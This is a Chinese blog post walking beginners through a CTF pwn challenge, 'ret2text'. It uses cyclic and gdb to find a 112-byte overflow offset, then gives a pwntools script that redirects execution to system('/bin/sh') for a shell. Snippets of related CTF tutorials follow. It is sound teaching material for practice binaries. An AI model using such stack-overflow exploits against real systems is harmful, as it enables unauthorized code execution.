pwn,获取系统权限,入门题,cyclic

最新推荐文章于 2025-03-30 18:05:30 发布
最新推荐文章于 2025-03-30 18:05:30 发布
阅读量7k 收藏 46
点赞数 16
分类专栏: cyclic pwn 文章标签: pwn cyclic
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SanOrintea/article/details/82288959
版权

https://pan.baidu.com/s/1qy5cyX-RJDyl3wxOXypHtA
dx5d
这里写图片描述

  • 输入【./ret2text】运行程序,发现让你输入,那么我们先随便输入个【123456】,程序结束了。

- 列表内容

  • 用ida打开这个程序,发现有‘system’函数,还可以输入,那么就可以利用栈溢出获取系统权限。

这里写图片描述

  • 首先先多输入点,看看什么时候溢出,这里用cyclic有序字符串。

  • 输入【cyclic 200】生成200个有序字符。
    这里写图片描述

  • 用gdb打开ret2text,输入【gdb ret2text】。
    这里写图片描述

  • 输入【run】运行程序,程序让我们输入,则把刚生成的200个有序字符串输入,发现报错,那么就是溢出了。

  • 观察可知溢出的地方是‘0x62616164’。

  • 那么怎么知道到底有多少个数字溢出了呢?

  • 看他报错的意思是(跳转到0x62616164)这步出错了,意思就是没有0x62616164这个位置,那这个位置是从哪来的呢,就是我们200个有序字符其中最先溢出的第部分。那么只要知道这个0x62616164是我们输入的第几个,就可以数出来它前头有几个数字了。根据ASCII码表,又根据‘0x’是16进制的意思,可以查表得出这串数字转换成字母是‘baad’。接下来就要知道cyclic的顺序了,稍微观察一下就可以知道cyclic的规则(4个数4个数有规则),轻易的就可以数出它的位置。

  • 当然还有更简单的方法,前文也说了cyclic是有序字符串,自然有一个子函数可以查,“cyclic -l”代表着查询你所给的4bit字符前有几个字母。

  • 输入【cyclic -l 0x62616164】,得到112,说明‘baad’前有112个字母,那么这112个字母就是填充空栈的所需量了。接下来多的就会溢出。

  • 那么我们就要把我们要他跳转的位置放在112个字母后让他溢出,就可以实现跳转。
    这里写图片描述

  • 在ida里找到system函数,但是点进去所显示的语句所在的行数,不是system函数真正的行数,而是引用system函数的语句所在的行数。

  • 看到system和↑或者↓在同一行,点击↑或者↓,点了几次点不了了,就找到了system函数真正的位置。

这里写图片描述

  • 发现system函数的值是‘/bin/sh’,运行这个system函数加这个值就可以获得系统权限。
  • 记录下所要跳转到的这一行,写脚本,将其放在112个填充物的后面。
from pwn import *

sh=process('./ret2text')
elf=ELF('./ret2text')
target=0x0804863A
#即/bin/sh所在位置
sh.sendline('a'*112+p32(target))
#至此就获得了系统权限
sh.interactive()
#打开交互页面

退出gdb,输入【python exp.py ret2text】让程序运行我们的脚本。
终于,我们获得了系统权限。

这里写图片描述

CTFshow-PWN入门-前置基础-全篇
weixin_63576152的博客
07-31 5429
本文主要详解CTFshow中pwn入门系列的前置基础模块,共30道所用工具:linux环境下的虚拟机、IDA Pro、exeinfope的博客以下操作中小编用的都是自己的kali环境。
PWN入门学习
qq_20254219的博客
10-20 2857
基础PWN知识入门 二进制基础 ​ 从C源代码到可执行文件的生成过程 ​ 可执行文件广义上的可执行文件,文件本身是没有执行权限的,和用户权限无关。可以通过命令给文件赋权。 ELF的执行​ 需要将在磁盘上的程序载入内存中。 在磁盘中的是节,映射到内存就是段。 在执行过程中,存储在磁盘中具有相同权限的节会被映射到内存中合成一个段。进程虚拟地址空间​ 操作系统管理所有硬件,程序
【第一天】pwn获取系统权限入门cyclic-附件资源
03-02
【第一天】pwn获取系统权限入门cyclic-附件资源
C语言栈溢出
最新发布
2401_85074897的博客
03-30 445
是一种特殊的线性数据结构,其特点是后进先出(Last In First Out,LIFO)是用于存储局部变量,返回地址,函数参数等数据的内存区域根据 存储方式分为(使用连续的地址空间存储所有栈元素,通常采用数组实现。其优点是操作简单、访问速度快和(采用链式方式存储,通常采用单向链表实现。其优点是栈的大小可以动态调整,不存在满栈的情况,内存利用高效,但缺点是操作相对复杂1.分配和管理方式:由编译器自动管理(分配与释放)。
PWN环境安装
feng的博客
01-12 1309
这里写目录标一级目录二级目录三级目录linux换源pythonpwntoolschecksec和ROPgadgetgdbpwndbgonw_gadgetmain_arena_offsetIDA Promain_arena_offsetIDA Pro 一级目录 二级目录 三级目录 linux换源 vim /etc/apt/sources.list deb http://mirrors.aliyun.com/ubuntu/ xenial main deb-src http://mirrors.aliyun.c
cyclic
今天的北宅依旧没有回家
07-28 717
循环移动(cyclic.cpp/c/pas) (1s/256M)问描述 给出一个字符串S与N个操作。每个操作用三元组(L, R, K)进行描述:操作将字符串第L个到第R个位置构成的子串循环移动K次。一次循环移动就是将字符串最后的这个字符移动到第一位,其余的字符顺次后移。 例如,对于字符串abacaba,操作(L=3, R=6, K=1)后得到的字符串即为abbacaa。 求出在N个操作后得
Ctfshow pwn 02(自己做出的第一道pwn
weixin_64875092的博客
12-05 5619
算是一篇第一次做出pwn的日记了! 本文写给想要入门pwn但只安装好虚拟机和ida完全不知道怎么用的小白~ 有许多写的不严谨或无脑的地方请多包涵! 其中有许多我在做时踩到的坑(因为自己零基础实在不知道怎么问也不知道去问谁而导致浪费好多时间而进行不下去) 现在开始! 首先第一步,来到ctfshow的网站,找到这道pwn02 之后点击Launch an instance(这所是一个建立连接的步骤,少了这一步在使用python3时会出现如下报错)如果问我什么是python3,请耐心看下去
PWN入门之栈溢出
weixin_44681716的博客
03-12 1288
PWN入门 先利用IDA对pwn文件进行静态调试 对pwn文件进行反编译 因为CFT是夺旗赛,所以我们首先要找到get flag的函数 利用gdb进行动态调试 我们就可以利用栈溢出获取系统权限 利用通过输入大量的字符来使其达到溢出,判断溢出的位置,从而获得栈长。 我们利用cyclic length函数产生若干个有序字符。 利用cyclic 300产生300个有序字符。 用gdb来运...
巅峰极客第一场CTF部分writeup
郁离歌丶的博客
07-22 6235
额,上午驾校学车,中午打了会儿安恒的月赛,就来看巅峰极客的了。时间关系实力原因没做几个emmmm太菜了wa MISC-warmup-100pt 拿到一个bmp文件,套路走一波,右键查看属性emmm啥都没有。 丢到winhex里面也没有什么明显的提示或者信息。 放大招:stegsolve。放在各个颜色通道里面过一遍。 可以明显的看到每个颜色通道的最低位有异常数据。 将数据提取出来 ...
[cyclic手动测试偏移量]
GUANGUANMAO1的博客
11-01 531
在使用ida写时我们在显示偏移量时和实际偏移量不准确这个时候我们可以手动测试偏移量目是我写的这篇博客。
PWN 学习—某平台ROP2 writeup
SNAKEのBlog
08-01 522
64位栈帧学习 writeup 本能反应 RELRO:RELRO会有Partial RELRO和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 Stack:如果栈中开启Canary found,那么就不能用直接用溢出的方法覆盖栈中返回地址,而且要通过改写指针与局部变量、leak canary、overwrite canary的方法来绕过 NX:NX enabl...
CTF-PWN-level1(Jarvis oj)[栈上shellcode的执行]
SuperGate的博客
02-14 928
checksec发现没有开保护机制,所以我们可以考虑使用shellcode方法pwn掉。 查看vulnerable_function函数内部 发现程序直接给我们了buf的首地址。点进去看之后发现,buf只能存0x88个字符,但是我们可以读入0x100个字符。由于读入的时候字符串会暂时存在栈上,我们可以考虑覆盖return的地址到buf的首地址中,然后在buf首地址开始写入shellcode...
2017广东红帽杯pwn1_writeup:简单ROP
ACdream
05-09 4205
先来正能量一波:作为一个一直没入门pwn的小菜鸟,这一段时间一直被学弟按在地上摩擦很不爽很不爽~~~~~~~~ ------------------------------------------------------------------------------------ 先给出几个学习链接: 一步一步ROP:x86 一步一步ROP:x64 论文: Return-O
记第一次解PWN
天道酬勤
09-02 567
# -*- coding: cp936 -*- from pwn import * g_local=False #不设置log_level为debug会导致程序的输出不显示出来 context.log_level = 'debug' if g_local: #启动程序 p = process('./club') #调试器附加该程序 #gdb.att...
pwn(安装环境)
2302_80935968的博客
05-08 1416
在终端命令框中输入sudo passwd root后会让你输入kali的默认密码kali,然后会提示你输入一个新的密码,在输入过程中输入的密码不会像一般的设置密码一样显示,再按照提示输入一遍就可以了,完成后可以输入su root切换成root用户了。俗话说的好,静态调试看IDA,动态调试看pwngdb(其实动态调试也能用IDA啦),pwngdb可以帮助你在可执行文件执行的时候查看各种寄存器的值,以及函数地址和偏移量,甚至可以让你一条汇编语言一条汇编语言分析,是分析程序不可或缺的工具。
linux下gdb调试circle_x.c
natureworld2010的博客
07-14 370
终端使用gdb调试circle_x.c gdb就是GNU debugger 通过调试circle_x.c演示gdb调试器的使用。 调试使用的源码circle_x.c 实现输入半径得到面积的功能。 源码如图示。 源码实现效果如图示。 生成可调试文件 通过gcc -g circle_x.c -o circle_x.debug命令生成可调试文件 gdb circle_x.debug进入调试环境 gdb circle_x.debug 命令进入调试环境 run 命令执行运行过程 直接运行,如无bug直接输出结
[pwn]逻辑复杂利用简单
Breeze的博客
08-26 7619
逻辑复杂利用简单的pwn 遇到了一道坑有很多的,记录一下。目:forgot,目地址:forgot 首先查看安全策略 不是很高,就一个NX,看看代码逻辑吧,直觉告诉我并不简单: 一张图放不下,其实有溢出,但我由于主函数太长了还一堆小函数,没注意(吓到了)。中间switch之中的一堆小函数都是判断是不是字母、数字、下划线之类的,比如: 而且最后有个调用: 调用的值又和v14有关,导致...
pwntools库使用
03-30
### 使用 `pwntools` 库的方法 #### 安装 `pwntools` 为了使用 `pwntools`,首先需要安装该库。可以通过 Python 的包管理器 pip 来完成安装: ```bash pip install pwntools ``` 如果遇到权限或者希望在虚拟环境中运行,则可以考虑创建一个新的虚拟环境并在此环境下执行上述命令。 #### 基本功能介绍 `pwntools` 是一个专门为 CTF 和二进制漏洞挖掘设计的强大工具集,提供了多种用于网络通信、数据处理以及漏洞利用的功能模块。以下是几个核心组件及其用途[^2]: - **pwn**: 提供了诸如连接服务器 (`remote`)、启动本地进程 (`process`) 或者调试目标程序等功能。 - **asm/disasm**: 支持汇编指令到机器码转换 (assembly to machine code) 及其逆向操作。 - **cyclic patterns**: 自动生成循环字符串模式以便于快速定位溢出偏移量。 - **shellcraft templates**: 预定义了一些常见的 shellcode 片段模板,方便构建自定义 payload。 #### 示例代码解析 这里给出一段简单的示例代码来展示如何通过 `pwntools` 进行基本的远程交互: ```python from pwn import * # 创建一个TCP连接至指定IP和端口上的服务 conn = remote('challenge.example.com', 1337) # 向服务发送消息 conn.sendline(b'hello') # 接收来自服务的数据直到遇见换行符为止 response = conn.recvline() print(response.decode()) # 关闭连接 conn.close() ``` 此脚本实现了与远端主机建立 TCP 连接,并交换了一条问候语句作为演示目的。 另外,在某些情况下可能还需要处理更复杂的场景比如栈缓冲区溢出攻击等高级技巧时,就可以充分利用之前提到过的那些特性如自动计算偏移位置或是生成特定类型的载荷等等[^1]。 对于初学者来说,《Pwn入门_1_pwntools的使用》文档会是非常好的起点材料之一因为它涵盖了从基础概念一直到实际案例分析整个流程;而对于想要探索其他编程语言实现方式的人群而言,“pwntools-ruby”项目则展示了基于Ruby版本下的相似解决方案[^3]。 ### 注意事项 当参与任何真实世界的网络安全活动前,请务必确认已获得适当授权以免违反法律条款!
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值